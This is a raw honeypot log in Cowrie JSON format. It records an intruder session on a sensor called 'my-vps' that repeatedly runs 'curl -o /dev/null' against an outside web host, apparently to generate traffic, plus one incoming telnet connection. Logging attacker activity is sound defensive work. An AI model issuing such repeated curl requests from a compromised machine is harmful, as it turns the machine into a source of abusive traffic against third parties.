{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.821110Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.859113Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.860144Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.898736Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.900030Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.938967Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.940013Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:47.976946Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:47.978062Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.016500Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.017971Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.068980Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.070099Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.115252Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.116318Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.155095Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.156166Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.199115Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.200223Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.240903Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.242010Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.283475Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.284783Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.322765Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.323937Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.360778Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.362635Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.400094Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.401116Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.440572Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.441561Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.488613Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.489910Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.526367Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.527294Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.563940Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.564849Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.601296Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.602242Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.638961Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.639849Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.677645Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.678577Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.715716Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.716564Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.753200Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.754146Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.791151Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.792128Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.830643Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.831601Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.879185Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.880167Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.916497Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.917449Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.954478Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.955484Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:48.992084Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:48.993075Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.032662Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.033786Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.070740Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.071707Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.112186Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.113230Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.150528Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.151777Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.188023Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.189069Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.225693Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.226809Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.274261Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.275357Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.357391Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.358522Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.395846Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.396987Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.434734Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.435766Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.472881Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.473913Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.510431Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.511374Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.551374Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.552307Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.588644Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.589675Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.627007Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.628223Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.665182Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.666076Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.714372Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.715430Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.752002Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.753669Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.795687Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.796729Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.836572Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.837523Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.887590Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.888877Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.925771Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.926849Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:49.963376Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:49.964329Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:50.001187Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.002392Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:50.044366Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.045424Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.connect","src_ip":"221.153.192.22","src_port":43353,"dst_ip":"1.2.3.4","dst_port":23,"session":"7e7750f97e90","protocol":"telnet","message":"New connection: 221.153.192.22:43353 (1.2.3.4:23) [session: 7e7750f97e90]","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.069821Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:50.092176Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.093784Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:50.144372Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.145478Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:50.183353Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.184404Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:50.222259Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.223615Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:50.260051Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.261055Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:50.298003Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.299149Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:50.335971Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.337234Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:50.374287Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.375237Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:50.411806Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.412790Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:50.449277Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:50.450300Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
